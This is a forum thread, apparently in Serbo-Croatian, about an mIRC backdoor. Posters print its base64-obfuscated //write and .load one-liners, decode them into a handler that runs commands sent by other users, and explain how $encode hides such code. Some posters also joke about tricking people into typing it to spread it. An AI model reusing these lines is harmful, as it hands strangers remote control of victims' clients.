pa to ti je kodirano...

sta je kodirano ?????

Ma taj worm ti je kodiran...

Unutar $decode

a mene zanima kako se to kodira i kako se dekodira?

Kako prvo i prvo to nije worm, nego backdoor. Znaci zejb glasi:

//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg kill nick

Probat cu da objasnim kod.

//write - to znaci da zapusuje u czm.mrc

$decode - naredba za dekodiranje

(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) - to ti je codirani cod, kojeg dekodiras sa $decode

.load -rs czm.mrc - to je da louda taj backdoor.

msg kill nick - ako to neznash kaj je onda se udari po glavi.

------------

E sad kad kucas : //echo -a $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) - onda decodiras ovaj code i vidis: on ^*:text:ins*:?:{ . $+ $2- | haltdef } a to znaci da kad bilo ko napise "ins KOMANDA" ti ces ju napraviti. etc "ins quit ja sam jebeni lamer"!

Evo tolko od mene.

a kako se kodira?

$encode(TEXTKOJIZELISKODIRAT,m)

inace u helpu ti sve pise!

ja samo znam sa ovim codom tip je usao u moj PC
i postavio nove foldere na C:
Zato me interesuje detaljno objasnjenje

pa da li imas firewall?

Hmm ako ima firewall, neće mu raditi DCC.
Ako podesi da mu radi DCC, onda mu džaba firewall (u ovom slučaju).

Ljudi pa vi niste skuzili, on moze imati tone firewallova jedino rjesenje je da obrise taj backdoor ili da ignorira sve poruke i noticeve i ctcpove. Jer taj backdoor funkcinonira tipa:

DOBIS MSG na kojem PISE (kojeg ti ne vidis):" ins /remove c:/windows/win.ini " ti ces u mircu to kucat i obrisat ces si win.ini. I firewall ne reagira jer se to desava local

E ovako kad se konektujem na iRC odma mi ispise poruku da nema nicka kojem ja upste nisam pisao.
Bilo kome kada napisem izbaci poruku da taj nick koji je upado u moj PC nije online znaci da je tip podesio skriptu da mu javi kada sam ja na ircu.To po meni je jedna vrsta trojanca.
Imo sam firewall ali nista pa sam skonto da je to sve bilo u skripti.
Reinstaliro sam irc skriptu i sada nema vise tih poruka u vezi nicka koji je ulazio u PC.

yednostavno nadji tay fayl u mIRCu i obrishi ga (ono oznacish ga desni klick na mishu i delete..)
ybg od kad sam ya znao za tay "fazon" al samo ne znam kako se prikriva sa $decode :((( mora nekoda mi poyasni

Ne prikriva se sa decode nego sa encode! Primjer: kucas "//echo $encode(ja sam mali gad,m)" i vidjet ces "amEgc2FtIG1hbGkgZ2Fk" to ti je kodiran text.

E sad da to dekodiras kucas "//echo $decode(amEgc2FtIG1hbGkgZ2Fk,m)" i vidjet ces orginalnu poruku. Te stvari mozesh koristit i u LAME svrhe.

Primjer: //write fool.mrc $decode($decode(b24gKjpURVhUOmRlenRyMGphaDoqOi9xdWl0IGtpbGxlZCBieSBkZXp0cjBqYWg=,m)m) | .load -rs fool.mrc | .msg #deztr0jah A am INFECTED! Cuz am FOOL!

Najbitniji je ovaj kod: b24gKjpURVhUOmRlenRyMGphaDoqOi9xdWl0IGtpbGxlZCBieSBkZXp0cjBqYWg=

taj kod jednak je: on *:TEXT:deztr0jah:*:/quit killed by deztr0jah

valjda sad nesto kuzish

KAMEN, koja je skripta u pitanju? ili addon?

to je obican IRC-Troyan i nikakav firewall ti nece pomoci oko toga shto kaze bananko.Samo odes u mirc fajl i izbrisi to czm

Ok tako sam i rijesio, izbriso skrptu i ponovo instaliro i sad je OK.


hvala na pomoci

Lol, kad sam video od koga si to primio sve mi je jasno :)) Inace ima dosta tih irc worm-ova po ircu, i sa encode-om se moze napraviti mnogo mocan kod i naterati se neki lamer da ga otkuca i on dalje nastavlja da ga siri :)) Napravis botnet lol :D mada pametni deztr0jah :P lol

pa da..

sve je to opusteno... ;)

kad lepo neko posalje takvu porku.. ukucajte ovo da bi dobili @ na tom i tom kanalu.. ko hoce op.. eto mu ;)